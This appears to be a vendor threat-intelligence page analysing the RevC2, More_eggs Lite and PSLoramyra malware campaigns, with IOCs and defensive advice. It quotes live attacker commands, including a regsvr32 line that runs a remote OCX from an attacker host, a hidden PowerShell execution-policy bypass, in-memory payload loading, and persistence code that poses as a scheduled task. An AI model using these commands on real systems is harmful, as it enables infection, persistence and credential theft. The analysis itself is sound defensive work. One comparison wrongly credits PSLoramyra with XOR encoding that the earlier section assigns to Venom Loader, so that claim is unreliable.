company logo

Product

Our Product

We are Reshaping the way Developers find and fix vulnerabilities before they get exploited.

Solutions

By Industry

BFSI

Healthcare

Education

IT & Telecom

Government

By Role

CISO/CTO

DevOps Engineer

Resources

Resource Library

Get actionable insight straight from our threat Intel lab to keep you informed about the ever-changing Threat landscape.

Subscribe to Our Weekly Threat Digest

Company

Contact Us

Have queries, feedback or prospects? Get in touch and we shall be with you shortly.

loading..
loading..
loading..
Loading...

ToxicPanda

Trojan

Banking

loading..
loading..
loading..

ToxicPanda: New Android Banking Trojan Targeting Multiple Regions

Explore ToxicPanda, a new banking trojan spreading from Asia to Europe and LATAM. Learn how it exploits Android devices for on-device fraud and RAT capabilities

06-Nov-2024
12 min read

Related Articles

loading..

Fileless Malware

MaaS

Explore detailed analysis of advanced fileless malware RevC2, More_eggs Lite, an...

Advanced malware campaigns continue to adapt and employ sophisticated techniques to infiltrate, persist, and exploit targeted systems. This technical [Threatfeed](https://www.secureblink.com/cyber-security-news) presents an exhaustive analysis of three notable malware campaigns: **RevC2**, **More_eggs Lite**, and **PSLoramyra**. Each of these campaigns exemplifies distinct methodologies for evading detection, establishing persistence, and executing malicious payloads. By dissecting their infection chains, execution mechanisms, communication protocols, and persistence strategies, this analysis aims to provide a comprehensive understanding of their operational nuances and offer actionable insights for detection and mitigation. --- ## **Overview of Malware Campaigns** ### **Campaign 1: API Documentation Lure Leading to RevC2** **Duration:** August to September **Overview:** This campaign employs an API documentation lure delivered via obfuscated LNK files (VenomLNK) to execute a malicious payload known as **RevC2**. RevC2 is a backdoor with capabilities to steal sensitive data and maintain persistent access. ### **Campaign 2: Cryptocurrency Transaction Lure Leading to Venom Loader and More_eggs Lite** **Duration:** September to October **Overview:** Leveraging the allure of cryptocurrency transactions, this campaign delivers the **Venom Loader**, which subsequently loads **More_eggs Lite**, a JavaScript-based backdoor providing remote code execution (RCE) capabilities. ### **Campaign 3: PSLoramyra Fileless Malware Loader** **Overview:** **PSLoramyra** is a sophisticated fileless malware loader that utilizes PowerShell, VBS, and BAT scripts to inject malicious payloads directly into memory, thereby evading traditional detection mechanisms. It establishes persistent access through Windows Task Scheduler and employs advanced obfuscation and process injection techniques. --- ## **Detailed Technical Analysis** ### **3.1. Campaign 1: RevC2** #### **3.1.1. Attack Chain Overview** The attack chain for Campaign 1 is a multi-stage process designed to deliver and execute the RevC2 backdoor seamlessly: 1. **Distribution Method:** The initial vector is an obfuscated LNK file named **VenomLNK**. 2. **Payload Delivery:** VenomLNK contains an obfuscated BAT script that downloads an API documentation PNG image from a specified URL. 3. **Execution Flow:** The BAT script registers an ActiveX control via `regsvr32` to initiate the RevC2 payload. #### **3.1.2. First Stage: VenomLNK** - **Obfuscation Techniques:** - **LNK File Usage:** The use of LNK files (VenomLNK) is a strategic choice to bypass basic security measures and obfuscate the malicious intent from users and automated detection systems. - **Obfuscated BAT Script:** Embedding an obfuscated BAT script within the LNK file serves to hide the true nature of the payload and its execution sequence. - **API Documentation Lure:** - **Legitimacy Exploitation:** By using an API documentation image as a lure, the attackers exploit the trust users place in legitimate documentation resources, increasing the likelihood of user interaction and execution. - **Command Execution:** - **ActiveX Control Registration:** ```shell wmic process call create "regsvr32 /s /i \\gdrive.rest@8080\api\AdvancedWin.ocx" ``` - **Purpose:** This command registers the ActiveX control silently (`/s`) and passes parameters (`/i`), thereby triggering the execution of the RevC2 payload without user awareness. #### **3.1.3. Second Stage: RevC2 Backdoor** - **Binary Analysis:** - **PDB Path Indication:** The presence of `Rev.pdb` in the binary path (`C:\Users\PC\Desktop\C2New\Rev\x64\Release\Rev.pdb`) may unintentionally reveal development or debugging information, potentially aiding forensic analysts in understanding the malware's structure. - **Execution Conditions:** - **Command-Line Argument Checks:** - Verifies if the first argument ends with `dWin.ocx`. - Ensures the executable path matches `regsvr32.exe`. - **Purpose:** These conditional checks ensure that RevC2 only executes within the intended attack chain, thereby evading execution in analysis environments like sandboxes. - **Persistence and Logging:** - **Log File Creation:** - **Path:** `C:\ProgramData\boot_%YYYYMMDDTHHMMSS%.log` - **Content:** Stores internal messages with timestamps, providing operational transparency while minimizing immediate detection through anomalous behavior. #### **3.1.4. Communication Protocol** - **WebSockets Usage:** - **Library:** Utilizes the C++ library `websocketpp` for establishing WebSocket connections. - **C2 Address:** Hardcoded in the binary (e.g., `ws://208.85.17.52:8082`). - **Data Format:** JSON objects facilitate structured and easily parsable communication between the victim's machine and the C2 server. - **JSON Communication:** - **Victim to C2:** ```json { "%output_name%": "%output_value%", "type": "%command_ID%" } ``` - **C2 to Victim:** ```json { "type": "%command_ID%", "command": "%command_parameter%" } ``` - **Dynamic Command IDs:** The `command_ID` sent by RevC2 may differ from the one sent by the C2 server, enhancing command obfuscation and reducing predictability. #### **3.1.5. Command Functionality** RevC2 supports a range of commands, each identified by a unique `command_ID`: | **Action** | **command_ID** | **command_parameter** | **Description** | |------------------------------------|-----------------|--------------------------------------------------------------------------------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------| | Steals passwords | `000000` | Empty | Extracts saved passwords from Chromium browsers and sends them to the C2 server. Logs the action with a timestamped message. | | Executes shell commands | `0001` | `%command%` | Executes arbitrary shell commands using `cmd /c`, captures the output via a pipe, and sends the results to the C2 server. | | Takes screenshots | `0002` | `%multiplier%` | Captures screenshots with resolution scaled by the multiplier value, encodes them in base64, and sends them to the C2 server. Logs the action. | | Proxies traffic | `0003` | `{"listenerIP": "%ip%", "listenerPort" : "%port%"}` | Sets up a SOCKS5 proxy by connecting to a target address and relaying data between the victim and the proxy server. Uses internal command IDs `0x55` and `0x70`. | | Steals cookies | `0009` | Empty | Extracts cookies from Chromium browsers and sends them to the C2 server. Logs detailed information about the stolen cookies. | | Executes a command as a different user | `0012` | `{"username": "%username%", "password": "%password%", "command": "%commandline%"}` | Executes specified commands under different user credentials without sending the output to the C2 server. | #### **3.1.6. Detection and Mitigation Strategies** - **Behavioral Analysis:** - **Regsvr32 Monitoring:** Track executions of `regsvr32` with unusual network paths or parameters. - **Process Validation:** Monitor processes for unexpected injections into `regsvr32.exe`. - **Network Monitoring:** - **WebSocket Traffic Analysis:** Scrutinize WebSocket connections to known malicious C2 servers (e.g., `ws://208.85.17.52:8082`). - **JSON Payload Inspection:** Analyze the structure and content of JSON communications for suspicious patterns. - **Endpoint Protection:** - **Advanced Endpoint Detection and Response (EDR):** Deploy EDR solutions capable of identifying behaviors specific to RevC2, such as conditional execution checks and specific command patterns. - **Credential Security:** - **Browser Security Enhancements:** Implement browser security measures to protect stored credentials. - **Credential Managers:** Use credential managers that encrypt stored passwords to mitigate the risk of theft. - **Further Investigation:** - **Distribution Mechanism Analysis:** Investigate how VenomLNK files are disseminated (e.g., phishing, malicious downloads). - **C2 Infrastructure Mapping:** Identify and disrupt the C2 server infrastructure. - **Payload Variability Assessment:** Analyze variations in URLs and filenames across samples to understand the malware's adaptability. --- ### **3.2. Campaign 2: More_eggs Lite via Venom Loader** #### **3.2.1. Attack Chain Overview** Campaign 2 employs a cryptocurrency transaction lure to deliver the **Venom Loader**, which subsequently loads **More_eggs Lite**, a JavaScript-based backdoor offering RCE capabilities. The attack chain comprises multiple stages to ensure stealth, persistence, and effective payload execution. #### **3.2.2. First Stage: VenomLNK** - **Obfuscation Techniques:** - **LNK File Usage:** Similar to Campaign 1, VenomLNK files contain obfuscated BAT scripts to evade detection. - **Multi-Script Execution:** The LNK file orchestrates the execution of VBS and BAT scripts to complicate analysis and hinder straightforward detection. - **Cryptocurrency Transaction Lure:** - **Exploiting User Interest:** Leveraging the popularity and financial incentive associated with cryptocurrency transactions increases the likelihood of user interaction and engagement with the malicious content. - **Script Execution Flow:** 1. **VBS and BAT Script Generation:** The initial BAT script writes `run_bat.vbs` and `bat2.bat` to the Windows temporary directory. 2. **Script Execution:** Executes `run_bat.vbs`, which in turn runs `bat2.bat`. 3. **Payload Download:** `bat2.bat` downloads an image of a cryptocurrency transaction as a lure and displays it to the victim. 4. **Malicious Payload Download:** Concurrently, downloads `base.zip` containing `ApplicationFrameHost.exe` from a designated URL. #### **3.2.3. Second Stage: Venom Loader** - **Customization Per Victim:** - **Dynamic DLL Generation:** Venom Loader DLLs are custom-built for each victim, complicating the creation of universal detection signatures and impeding automated analysis. - **Encoding Mechanism:** - **XOR Encoding with Environment Variables:** Uses the `%computername%` environment variable as an XOR key to encode subsequent payload stages, introducing system-specific variability that challenges detection and analysis. - **Persistence Mechanism:** - **Task Scheduler Integration:** Creates a scheduled task to ensure continuous execution and persistence across system reboots. - **Execution Flow:** 1. **Sideloading Malicious DLL:** - Unzips `base.zip` containing `ApplicationFrameHost.exe`. - Executes `ApplicationFrameHost.exe`, which sideloads `dxgi.dll`, leading to Venom Loader execution. 2. **Payload Handling:** - **More_eggs Lite Delivery:** Venom Loader decodes and executes the More_eggs Lite backdoor by writing split, encoded chunks to disk and reconstructing them via a PowerShell script. #### **3.2.4. Third Stage: More_eggs Lite Backdoor** - **Functionality:** - **Remote Code Execution (RCE):** Enables attackers to execute arbitrary commands on the infected system. - **HTTP POST Communication:** Continuously sends POST requests to the C2 server for command reception and output exfiltration. - **Communication Protocol:** - **POST Request Structure:** - **URL:** `<c2_address>/api/infos` - **POST Data:** ```plaintext name=^%computername%&ret= ``` - **Command Response:** - JSON response containing `{"command": %command_encoded%}`, which is XOR’ed with `%computername%` and executed as a `.cmd` file. #### **3.2.5. Communication Protocol** - **C2 Communication:** - **HTTP Protocol:** Utilizes standard HTTP POST requests, which can blend with legitimate traffic, complicating detection. - **Command Encoding:** Commands are XOR-encoded using `%computername%`, adding an obfuscation layer that requires decoding for analysis. #### **3.2.6. Detection and Mitigation Strategies** - **Script Monitoring:** - **VBS and BAT Script Detection:** Monitor the creation and execution of `run_bat.vbs` and `bat2.bat` scripts, especially those interacting with temporary directories. - **Registry Monitoring:** - **Task Scheduler Auditing:** Detect unauthorized additions to the Task Scheduler, particularly tasks masquerading as legitimate services like `GoogleUpdate`. - **Network Traffic Analysis:** - **Anomalous HTTP POST Requests:** Identify and analyze unusual POST requests to endpoints like `/api/infos`, especially those with encoded command data. - **Endpoint Protection:** - **Behavioral Detection:** Deploy EDR solutions capable of identifying the behaviors associated with Venom Loader and More_eggs Lite, such as environment variable-based encoding and in-memory execution. - **Further Investigation:** - **Encoding Technique Analysis:** Examine the XOR encoding mechanism and its reliance on environment variables for potential detection patterns. - **C2 Server Infrastructure:** Investigate the infrastructure behind the C2 servers to disrupt command and control capabilities. - **Persistence Mechanism Robustness:** Assess the resilience of the Task Scheduler-based persistence against common security measures and removal techniques. --- ### **3.3. Campaign 3: PSLoramyra Fileless Malware Loader** #### **3.3.1. Infection Chain and Execution Flow** **PSLoramyra** is an advanced **fileless malware loader** that leverages PowerShell, VBS, and BAT scripts to inject and execute malicious payloads directly in memory, thereby evading traditional detection methods. The infection chain comprises several meticulously orchestrated stages to ensure stealth, persistence, and effective payload execution. **Infection Chain Stages:** 1. **Initial PowerShell Script Execution:** - Contains the main malicious payload and scripts required for further execution. - Generates essential files: `roox.ps1`, `roox.bat`, and `roox.vbs`. - Initiates the execution chain by running `roox.vbs`. 2. **Execution Chain:** - **roox.vbs:** Launches `roox.bat` in a hidden window. - **roox.bat:** Executes `roox.ps1` with stealth-enhancing PowerShell flags. - **roox.ps1:** Deobfuscates and loads the main malicious payload directly into memory using `.NET Reflection` and injects it into a legitimate process (`RegSvcs.exe`). 3. **Payload Execution:** - **Quasar RAT:** Loaded into memory, providing remote access capabilities to the threat actor. 4. **Establishing Persistence:** - Utilizes Windows Task Scheduler to create a task that runs `roox.vbs` every two minutes, ensuring continuous execution. #### **3.3.2. Detailed Script Breakdown** ##### **3.3.2.1. roox.vbs Script** - **Functionality:** Acts as a bridge between the Task Scheduler and the subsequent scripts, ensuring the infection chain progresses seamlessly. - **Key Components:** - **Error Handling:** - `On Error Resume Next`: Suppresses error messages to maintain stealth during execution failures. - **CreateWshShellObj Function:** - Creates a `WScript.Shell` COM object to execute commands and scripts. - **GetFilePath Function:** - Retrieves the absolute path to `roox.bat`. - **GetVisibilitySetting Function:** - Configures the execution to run in a hidden window (`0`), preventing user awareness. - **RunFile Function:** - Executes `roox.bat` using the hidden window settings to maintain stealth. - **Execution Sequence:** 1. Creates the `WScript.Shell` object. 2. Retrieves the path to `roox.bat`. 3. Sets the window style to hidden. 4. Executes `roox.bat` in hidden mode. ##### **3.3.2.2. roox.bat Script** - **Functionality:** Executes the PowerShell script `roox.ps1` with specific flags to enhance stealth and bypass security measures. - **Key Commands:** ```bat powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\roox.ps1" ``` - **Flags Explained:** - `-NoProfile`: Prevents the loading of user-specific PowerShell profiles. - `-WindowStyle Hidden`: Conceals the PowerShell window during execution. - `-ExecutionPolicy Bypass`: Overrides PowerShell's execution policies to allow unrestricted script execution. ##### **3.3.2.3. roox.ps1 Script** - **Functionality:** Deobfuscates the main malicious payload, dynamically loads it into memory, and executes it using `.NET Reflection` and `RegSvcs.exe`. - **Key Components:** - **Obfuscated Payload Storage:** - **Variables:** - `$RoXstring_lla`: Stores part of the malicious payload as a HEX string with `%&%` delimiters. - `$Mordexstring_ojj`: Stores the remaining payload similarly. - **Deobfuscation Process:** ```powershell [Byte[]] $NKbb = $Mordexstring_ojj -split '%&%' | ForEach-Object { [byte]([convert]::ToInt32($_, 16)) } [Byte[]] $pe = $RoXstring_lla -split '%&%' | ForEach-Object { [byte]([convert]::ToInt32($_, 16)) } ``` - **Steps:** 1. **Splitting HEX Strings:** Divides the HEX strings into individual byte segments using `%&%` as a delimiter. 2. **Conversion to Bytes:** Converts each HEX segment into its corresponding byte value, forming byte arrays. - **Obfuscation Cleaning:** - **Removing `#` Symbols:** ```powershell $cleanedString = $obfuscatedString -replace '#', '' ``` - Transforms strings like `L####o####a####d` into `Load` to restore method names. - **Assembly Loading and Payload Execution:** ```powershell [Reflection.Assembly]::Load($binaryPayload) ``` - **Steps:** 1. **Load .NET Assembly:** Uses `Reflection.Assembly.Load` to inject the malicious assembly into memory. 2. **Process Injection:** Targets `RegSvcs.exe` to host the malicious payload, blending it with legitimate system processes. 3. **Quasar RAT Execution:** Executes the `Quasar RAT` within the injected process, providing remote access capabilities. #### **3.3.3. Payload Execution and Memory Injection** - **Reflection.Assembly.Load:** - **Purpose:** Dynamically loads the malicious .NET assembly into the memory space of a legitimate system process (`RegSvcs.exe`), avoiding disk-based traces. - **Process Injection via RegSvcs.exe:** - **Methodology:** Injects the Quasar RAT into `RegSvcs.exe`, a legitimate Windows process, to conceal malicious activity within normal system operations. #### **3.3.4. Persistence Mechanism** - **Windows Task Scheduler Integration:** - **Task Creation Steps:** 1. **Scheduler Object Initialization:** ```powershell New-Object -ComObject Schedule.Service $scheduler.Connect() ``` 2. **Task Definition:** ```powershell $taskDefinition = $scheduler.NewTask(0) $taskDefinition.Settings.Enabled = $true ``` 3. **Trigger Configuration:** ```powershell $trigger.Repetition.Interval = “PT2M” ``` - **Frequency:** Every two minutes to ensure continuous execution. 4. **Action Configuration:** ```powershell $action.Path = “C:\Users\Public\roox.vbs” ``` 5. **Task Registration:** ```powershell $taskFolder.RegisterTaskDefinition() ``` - **Task Naming:** Registered under the name `GoogleUpdate` to mimic a legitimate service, reducing suspicion. - **Purpose:** Ensures that `roox.vbs` is executed at regular intervals, maintaining persistent malware presence even after system reboots or manual termination attempts. #### **3.3.5. Evasion Techniques** **PSLoramyra** employs a suite of sophisticated evasion strategies to bypass detection: - **Fileless Execution:** - **Memory-Based Payloads:** Injects malicious code directly into memory without writing persistent files to disk, evading traditional signature-based detection methods. - **Obfuscation:** - **HEX Encoding with Delimiters:** Uses HEX strings separated by `%&%` to obfuscate the payload, complicating static analysis and signature generation. - **Symbol Removal:** Removes `#` symbols to clean obfuscated method names, further hindering analysis efforts. - **Stealthy Process Injection:** - **Legitimate Process Targeting:** Injects payloads into `RegSvcs.exe`, a legitimate Windows process, masking malicious activity within normal system operations. - **Hidden Execution:** - **Invisible Script Execution:** Runs scripts in hidden windows, preventing user awareness and reducing the likelihood of manual detection. - **Persistence via Legitimate Services:** - **Task Naming Mimicry:** Registers scheduled tasks under names like `GoogleUpdate`, leveraging the trust associated with legitimate services to avoid raising alarms. #### **3.3.6. Indicators of Compromise (IOCs)** **Hashes:** - `ac05a1ec83c7c36f77dec929781dd2dae7151e9ce00f0535f67fcdb92c4f81d9` - `9018a2f6018b6948fc134490c3fb93c945f10d89652db7d8491a98790d001c1e` - `d50cfca93637af25dc6720ebf40d54eec874004776b6bc385d544561748c2ffc` - `Ef894d940115b4382997954bf79c1c8272b24ee479efc93d1b0b649133a457cb` **Files:** - `C:\Users\Public\roox.vbs` - `C:\Users\Public\roox.bat` - `C:\Users\Public\roox.ps1` **Domains:** - `Ronymahmoud.casacam.net` **IP Addresses:** - `3.145.156.44` #### **3.3.7. Detection and Mitigation Strategies** Given PSLoramyra's sophisticated evasion techniques, a multi-layered approach to detection and mitigation is essential: - **Behavioral Analysis:** - **Script Execution Monitoring:** Detect the creation and execution of `roox.vbs`, `roox.bat`, and `roox.ps1`. - **Process Injection Detection:** Monitor for unusual injections into legitimate processes like `RegSvcs.exe`. - **Task Scheduler Auditing:** Scrutinize scheduled tasks with suspicious names or high-frequency triggers. - **Network Traffic Monitoring:** - **C2 Communication Detection:** Identify and block communications with known malicious domains (`Ronymahmoud.casacam.net`) and IP addresses (`3.145.156.44`). - **Anomalous Traffic Detection:** Use network anomaly detection to spot unusual outbound connections or data exfiltration attempts. - **Script and File Monitoring:** - **File System Monitoring:** Detect the creation of files in public directories such as `C:\Users\Public\`. - **Script Content Analysis:** Utilize script scanning tools to analyze the contents of PowerShell, VBS, and BAT scripts for obfuscation patterns and suspicious commands. - **Endpoint Protection:** - **Advanced EDR Solutions:** Deploy EDR tools capable of detecting in-memory execution and process injection techniques. - **Anti-Malware Updates:** Ensure antivirus and anti-malware solutions are updated with the latest threat definitions and heuristic detection capabilities. - **User Education and Awareness:** - **Phishing Prevention Training:** Educate users about the risks of executing unsolicited scripts and the importance of verifying the legitimacy of downloaded files. - **Security Best Practices:** Encourage the principle of least privilege, limiting user permissions to reduce the impact of potential infections. --- ## **Cross-Campaign Insights and Comparative Analysis** ### **4.1. Common Techniques and Strategies** Despite targeting different vectors and employing distinct payloads, the analyzed campaigns share several common methodologies: - **Use of Obfuscated Scripts:** - **RevC2 and PSLoramyra:** Both campaigns utilize obfuscated BAT, VBS, and PowerShell scripts to conceal malicious intent and complicate detection. - **Process Injection:** - **RevC2 and PSLoramyra:** Both inject payloads into legitimate system processes (`regsvr32.exe` and `RegSvcs.exe` respectively) to mask malicious activities within normal system operations. - **C2 Communication:** - **RevC2, More_eggs Lite, and PSLoramyra:** All campaigns establish communications with external Command and Control (C2) servers, utilizing protocols like WebSockets and HTTP POST requests to receive commands and exfiltrate data. ### **4.2. Unique Characteristics** While sharing common techniques, each campaign exhibits unique attributes that distinguish it from the others: - **RevC2:** - **API Documentation Lure:** Uses legitimate-looking API documentation as a lure to increase user engagement. - **WebSocket-Based C2:** Employs WebSockets for real-time and persistent communication with the C2 server. - **More_eggs Lite:** - **Cryptocurrency Transaction Lure:** Leverages the financial incentive and popularity of cryptocurrency transactions to entice users. - **JavaScript-Based Backdoor:** Utilizes a JS backdoor for remote code execution, differentiating it from the predominantly PowerShell and BAT script-based execution in other campaigns. - **PSLoramyra:** - **Fileless Execution:** Executes entirely in memory without creating persistent files, enhancing stealth and evasion. - **XOR Encoding with Environment Variables:** Uses system-specific environment variables for encoding payloads, adding an additional layer of obfuscation. ### **4.3. Security Implications** The sophistication and diversity of these campaigns underscore the evolving nature of cyber threats: - **Evasion and Stealth:** Advanced evasion techniques like process injection, obfuscated scripting, and fileless execution make detection challenging, necessitating more sophisticated security measures. - **Data Theft and RCE Capabilities:** The focus on credential theft, cookie extraction, and remote code execution poses significant risks to both individual users and organizational infrastructures, enabling extensive data exfiltration and system compromise. - **Persistence Mechanisms:** Persistent access through Task Scheduler and regular script executions ensures long-term control over compromised systems, making remediation efforts more complex. --- ## **Comprehensive Indicators of Compromise (IOCs)** ### **5.1. Hashes** | **Hash Type** | **Value** | |---------------|-----------------------------------------------| | SHA-256 | `ac05a1ec83c7c36f77dec929781dd2dae7151e9ce00f0535f67fcdb92c4f81d9` | | SHA-256 | `9018a2f6018b6948fc134490c3fb93c945f10d89652db7d8491a98790d001c1e` | | SHA-256 | `d50cfca93637af25dc6720ebf40d54eec874004776b6bc385d544561748c2ffc` | | SHA-256 | `Ef894d940115b4382997954bf79c1c8272b24ee479efc93d1b0b649133a457cb` | ### **5.2. Files** | **File Path** | **Description** | |----------------------------------|-------------------------------------------------| | `C:\Users\Public\roox.vbs` | VBS script initiating the execution chain. | | `C:\Users\Public\roox.bat` | BAT script executing the PowerShell script. | | `C:\Users\Public\roox.ps1` | PowerShell script deobfuscating and loading payload. | ### **5.3. Domains** | **Domain** | **Description** | |-------------------------------|---------------------------------------------------------| | `Ronymahmoud.casacam.net` | C2 server domain used by PSLoramyra. | ### **5.4. IP Addresses** | **IP Address** | **Description** | |----------------------|-------------------------------------------| | `3.145.156.44` | IP address associated with PSLoramyra C2 server. | --- ## **Unified Detection and Mitigation Strategies** To effectively counter the multifaceted threats posed by RevC2, More_eggs Lite, and PSLoramyra, organizations should adopt a comprehensive and unified approach encompassing multiple layers of security. ### **6.1. Behavioral Analysis** - **Script Execution Monitoring:** - **Detection:** Identify the creation and execution of `roox.vbs`, `roox.bat`, and `roox.ps1` scripts. - **Tools:** Utilize EDR solutions that can track script executions and flag suspicious activities based on behavior rather than signatures. - **Process Injection Detection:** - **Detection:** Monitor for injections into legitimate processes like `regsvr32.exe` and `RegSvcs.exe`. - **Tools:** Advanced EDR tools can analyze process trees and detect anomalies indicative of process injection. - **Task Scheduler Auditing:** - **Detection:** Scrutinize tasks with high-frequency triggers (e.g., every two minutes) or suspicious names (e.g., `GoogleUpdate`). - **Tools:** Implement policies to alert on new or modified scheduled tasks, especially those deviating from normal patterns. ### **6.2. Network Traffic Monitoring** - **C2 Communication Detection:** - **Detection:** Identify and block communications with known malicious domains and IP addresses (e.g., `Ronymahmoud.casacam.net`, `3.145.156.44`). - **Tools:** Utilize network firewalls and intrusion detection systems (IDS) to filter and analyze outbound traffic for connections to malicious C2 servers. - **Anomalous Traffic Detection:** - **Detection:** Spot unusual WebSocket or HTTP POST traffic patterns that deviate from normal network behavior. - **Tools:** Implement anomaly detection systems that leverage machine learning to identify deviations indicative of malware communications. ### **6.3. Script and File Monitoring** - **File System Monitoring:** - **Detection:** Detect the creation of files in public directories (e.g., `C:\Users\Public\`) and monitor for the presence of known malicious scripts. - **Tools:** Deploy file integrity monitoring solutions to track and alert on unauthorized file creations or modifications. - **Script Content Analysis:** - **Detection:** Analyze the content of PowerShell, VBS, and BAT scripts for obfuscation patterns, HEX encoding, and suspicious commands. - **Tools:** Use script scanning tools and sandbox environments to perform dynamic and static analysis of scripts. ### **6.4. Endpoint Protection** - **Advanced Endpoint Detection and Response (EDR):** - **Capabilities:** EDR solutions should be capable of detecting in-memory execution, process injection, and anomalous script behaviors. - **Deployment:** Ensure EDR tools are consistently updated and configured to monitor for behaviors exhibited by RevC2, More_eggs Lite, and PSLoramyra. - **Anti-Malware Solutions:** - **Capabilities:** Ensure antivirus and anti-malware solutions are equipped with heuristic and behavior-based detection capabilities to identify emerging threats. - **Maintenance:** Regularly update malware definitions and perform routine scans to detect and remediate infections. ### **6.5. Persistence Mechanism Auditing** - **Task Scheduler Security:** - **Auditing:** Regularly audit Task Scheduler for unauthorized tasks, particularly those with high-frequency triggers or names mimicking legitimate services. - **Policies:** Implement strict policies governing who can create or modify scheduled tasks within the organization. - **Registry Monitoring:** - **Detection:** Monitor registry keys associated with autorun entries (e.g., `HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`) for unauthorized modifications. - **Tools:** Utilize registry monitoring tools to detect and alert on suspicious changes. ### **6.6. User Education and Awareness** - **Phishing Prevention Training:** - **Education:** Train users to recognize and avoid suspicious links, attachments, and downloads that may contain malicious scripts or payloads. - **Awareness Programs:** Implement regular awareness programs to keep users informed about evolving threat vectors and social engineering tactics. - **Security Best Practices:** - **Principle of Least Privilege:** Enforce least privilege access controls to minimize the potential impact of compromised accounts. - **Credential Management:** Promote the use of strong, unique passwords and implement multi-factor authentication (MFA) to protect user accounts. --- ## **Recommendations for Enhanced Security Posture** To fortify defenses against sophisticated malware campaigns like RevC2, More_eggs Lite, and PSLoramyra, organizations should adopt a holistic and proactive security strategy encompassing technical defenses, policy enforcement, and continuous monitoring. ### **7.1. Advanced Threat Detection Solutions** - **Deployment of Machine Learning-Based Systems:** - **Capabilities:** Utilize machine learning algorithms to identify and respond to anomalous behaviors indicative of malware activities. - **Benefits:** Enhances the ability to detect novel threats that evade signature-based detection methods. - **Integration with Threat Intelligence:** - **Action:** Incorporate threat intelligence feeds to stay updated on emerging threats, malicious IPs, and domains. - **Benefits:** Facilitates timely detection and blocking of known malicious entities involved in malware campaigns. ### **7.2. Strengthening Script Execution Policies** - **PowerShell Execution Policies:** - **Enforcement:** Restrict PowerShell execution to signed scripts only, preventing the execution of unauthorized or malicious scripts. - **Configuration:** Implement constrained language modes to limit the capabilities of PowerShell scripts, reducing the risk of abuse. - **Script Whitelisting:** - **Action:** Employ script whitelisting to allow only approved scripts to execute within the environment. - **Benefits:** Minimizes the risk of unauthorized script execution and facilitates the identification of rogue scripts. ### **7.3. Regular System Audits and Hardening** - **System File and Registry Audits:** - **Action:** Conduct periodic audits of system files, registry entries, and scheduled tasks to identify and remediate anomalies. - **Tools:** Utilize automated auditing tools to streamline the process and ensure comprehensive coverage. - **Security Hardening Measures:** - **Actions:** - Disable unnecessary services and ports to reduce attack surfaces. - Implement strict access controls and permissions to limit user capabilities. - Regularly apply security patches and updates to address vulnerabilities exploited by malware. ### **7.4. Network Segmentation and Monitoring** - **Network Segmentation:** - **Action:** Divide the network into distinct segments to contain potential breaches and limit lateral movement. - **Benefits:** Enhances overall network security by isolating critical systems and sensitive data. - **Intrusion Detection and Prevention Systems (IDS/IPS):** - **Deployment:** Implement IDS/IPS solutions to monitor and block malicious network traffic in real-time. - **Configuration:** Fine-tune IDS/IPS rules to detect patterns associated with malware communications and command executions. ### **7.5. Threat Intelligence Integration** - **Centralized Threat Intelligence Platforms:** - **Action:** Integrate threat intelligence platforms to aggregate and analyze data from multiple sources. - **Benefits:** Provides a comprehensive view of the threat landscape, enabling informed decision-making and proactive defenses. - **Collaborative Intelligence Sharing:** - **Action:** Participate in information-sharing communities and platforms to exchange threat intelligence with peers and industry groups. - **Benefits:** Enhances collective awareness and resilience against emerging threats. --- ## **Potential Areas for Further Investigation** To comprehensively understand and mitigate the threats posed by RevC2, More_eggs Lite, and PSLoramyra, further investigation is essential in the following areas: ### **8.1. Distribution Mechanisms** - **Initial Infection Vectors:** - **Action:** Investigate how these malware campaigns disseminate their initial LNK files (e.g., phishing emails, malicious downloads, exploit kits). - **Purpose:** Understanding distribution methods is crucial for implementing targeted prevention measures and disrupting the malware's spread. ### **8.2. C2 Infrastructure Analysis** - **Mapping C2 Servers:** - **Action:** Analyze and map out the Command and Control infrastructure utilized by these malware families. - **Tools:** Employ network forensics and threat intelligence tools to identify and locate C2 servers. - **Purpose:** Disrupting C2 communication can hinder malware functionality and limit data exfiltration. ### **8.3. Payload Variants and Evolution** - **Monitoring for New Variants:** - **Action:** Continuously monitor for new variants of RevC2, More_eggs Lite, and PSLoramyra that may introduce additional functionalities or evasion techniques. - **Tools:** Utilize threat intelligence platforms and malware analysis tools to detect and analyze new variants. - **Purpose:** Staying abreast of malware evolution ensures that defenses remain effective against emerging threat vectors. ### **8.4. Threat Actor Profiling** - **Identifying Threat Actors:** - **Action:** Conduct threat intelligence gathering to attribute these malware campaigns to specific threat actors or groups. - **Techniques:** Analyze TTPs (Tactics, Techniques, and Procedures), infrastructure, and operational patterns to profile the threat actors. - **Purpose:** Understanding the motivations and capabilities of threat actors aids in anticipating future tactics and strengthening defenses accordingly. --- ## **Conclusion** The comprehensive analysis of the RevC2, More_eggs Lite, and PSLoramyra malware campaigns reveals a convergence of sophisticated techniques aimed at evading detection, establishing persistent access, and executing malicious payloads effectively. These campaigns employ a blend of obfuscated scripting, process injection, fileless execution, and strategic C2 communications to maintain stealth and operational resilience. **RevC2** leverages API documentation lures and WebSocket-based C2 communication to execute a versatile backdoor capable of credential theft and remote code execution. **More_eggs Lite**, delivered via Venom Loader, utilizes cryptocurrency transaction lures and JavaScript-based backdoors to offer robust RCE capabilities. **PSLoramyra** stands out with its entirely fileless execution model, advanced obfuscation techniques, and persistent Task Scheduler integration, making it particularly challenging to detect and mitigate. To effectively counter these threats, organizations must adopt a layered and proactive security posture that encompasses advanced detection solutions, rigorous monitoring, user education, and continuous threat intelligence integration. By understanding the intricacies of these malware campaigns and implementing comprehensive defense strategies, organizations can enhance their resilience against sophisticated cyber threats. --- ## **Summary of Indicators of Compromise (IOCs)** ### **5.1. Hashes** | **Hash Type** | **Value** | |---------------|-----------------------------------------------| | SHA-256 | `ac05a1ec83c7c36f77dec929781dd2dae7151e9ce00f0535f67fcdb92c4f81d9` | | SHA-256 | `9018a2f6018b6948fc134490c3fb93c945f10d89652db7d8491a98790d001c1e` | | SHA-256 | `d50cfca93637af25dc6720ebf40d54eec874004776b6bc385d544561748c2ffc` | | SHA-256 | `Ef894d940115b4382997954bf79c1c8272b24ee479efc93d1b0b649133a457cb` | ### **5.2. Files** | **File Path** | **Description** | |----------------------------------|-------------------------------------------------| | `C:\Users\Public\roox.vbs` | VBS script initiating the execution chain. | | `C:\Users\Public\roox.bat` | BAT script executing the PowerShell 